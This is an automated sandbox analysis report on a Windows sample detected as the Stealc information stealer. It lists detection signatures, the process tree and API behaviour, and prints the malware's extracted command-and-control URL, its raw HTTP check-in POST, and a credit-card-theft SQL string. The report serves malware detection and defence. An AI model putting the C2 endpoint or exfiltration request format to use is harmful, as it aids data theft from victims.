Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YLshJwBcrT.exe

Overview

General Information

Sample name:YLshJwBcrT.exe
renamed because original name is a hash value
Original sample name:015ac525cdf1038d8ceb75ba43068da0.exe
Analysis ID:1528648
MD5:015ac525cdf1038d8ceb75ba43068da0
SHA1:dc28851e6a02c567dfeabcd3d642f06f5f569d5e
SHA256:33367a662e6fe40c4fc42063a7c676a376674552e4abde488a25695bcc211552
Tags:32exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • YLshJwBcrT.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\YLshJwBcrT.exe" MD5: 015AC525CDF1038D8CEB75BA43068DA0)
    • WerFault.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xaf8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.YLshJwBcrT.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.3.YLshJwBcrT.exe.2330000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.YLshJwBcrT.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.YLshJwBcrT.exe.2330000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.YLshJwBcrT.exe.22e0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T07:21:12.143104+020020442431Malware Command and Control Activity Detected192.168.2.54970462.204.41.15080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
                    Multi AV Scanner detection for domain / URL
                    Source: http://62.204.41.150/edd20096ecef326d.php-Virustotal: Detection: 6%Perma Link
                    Source: http://62.204.41.150/Virustotal: Detection: 9%Perma Link
                    Source: http://62.204.41.150/edd20096ecef326d.phpVirustotal: Detection: 14%Perma Link
                    Source: http://62.204.41.150/edd20096ecef326d.phpEVirustotal: Detection: 6%Perma Link
                    Source: http://62.204.41.150/edd20096ecef326d.phpIVirustotal: Detection: 6%Perma Link
                    Source: http://62.204.41.150Virustotal: Detection: 9%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: YLshJwBcrT.exeVirustotal: Detection: 37%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: YLshJwBcrT.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022ECA87
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022E74A7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022E9D27
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022F9107
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022E9DC7

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeUnpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack
                    Source: YLshJwBcrT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EF8F1 FindFirstFileA,0_2_022EF8F1
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://62.204.41.150/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"B64F4A8B3FA83148152816------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build"default6_cap------GIEHIDHJDBFIIECAKECB--
                    Source: Joe Sandbox ViewIP Address: 62.204.41.150 62.204.41.150
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"B64F4A8B3FA83148152816------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build"default6_cap------GIEHIDHJDBFIIECAKECB--
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/e
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php-
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpE
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpG
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpI
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpQ
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpS
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpt
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.1503
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                    Source: YLshJwBcrT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: YLshJwBcrT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@8/29@0/1
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IVQU5RT5.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\24ac4273-1c21-419f-800f-588e35937c8aJump to behavior
                    Source: YLshJwBcrT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardss;
                    Source: YLshJwBcrT.exeVirustotal: Detection: 37%
                    Source: unknownProcess created: C:\Users\user\Desktop\YLshJwBcrT.exe "C:\Users\user\Desktop\YLshJwBcrT.exe"
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: wuliwiyixenotafube.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: wldp.dllJump to behavior
